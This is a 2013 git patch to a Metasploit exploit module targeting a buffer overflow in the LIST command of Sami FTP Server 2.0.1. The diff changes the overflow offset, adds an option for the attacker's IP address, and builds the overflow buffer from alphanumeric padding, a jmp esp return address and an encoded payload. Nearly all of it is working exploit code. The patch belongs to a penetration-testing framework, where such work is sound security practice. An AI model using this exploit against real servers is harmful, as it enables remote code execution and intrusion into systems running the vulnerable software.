From fb90a1b497204a8ff1bd29b185ac7ff738654f09 Mon Sep 17 00:00:00 2001
From: dougsko
Date: Mon, 18 Mar 2013 16:18:04 -0300
Subject: [PATCH] Uses IP address length in offset calculation

---
 modules/exploits/windows/ftp/sami_ftpd_list.rb | 14 ++++++++++----
 1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb
index 5f501c96e2..52b8d9f12f 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_list.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb
@@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
 'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
 'Description' => %q{
 A buffer overflow is triggered when a long LIST
- command is sent to the server and the user views the Log tab.
+ command is sent to the server while the user is viewing the Logs tab.
 },
 'Platform' => 'win',
 'Author' =>
@@ -48,18 +48,24 @@ class Metasploit4 < Msf::Exploit::Remote
 'Windows Universal',
 {
 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
- 'Offset' => 219,
+ 'Offset' => 225,
 },
 ],
 ],
 'DefaultTarget' => 0,
 'DisclosureDate' => 'Feb 27 2013'))
+ register_options(
+ [
+ OptString.new('IPADDR', [true, 'Attacker\'s IP address'])
+ ], self.class)
 end
 def exploit
 connect_login
-
- buf = rand_text(target['Offset'], payload_badchars)
+ sleep 1
+
+ ip_length = datastore['IPADDR'].length - 3
+ buf = rand_text_alphanumeric(target['Offset'] - ip_length)
 buf << [ target['Ret'] ].pack('V')
 buf << payload.encoded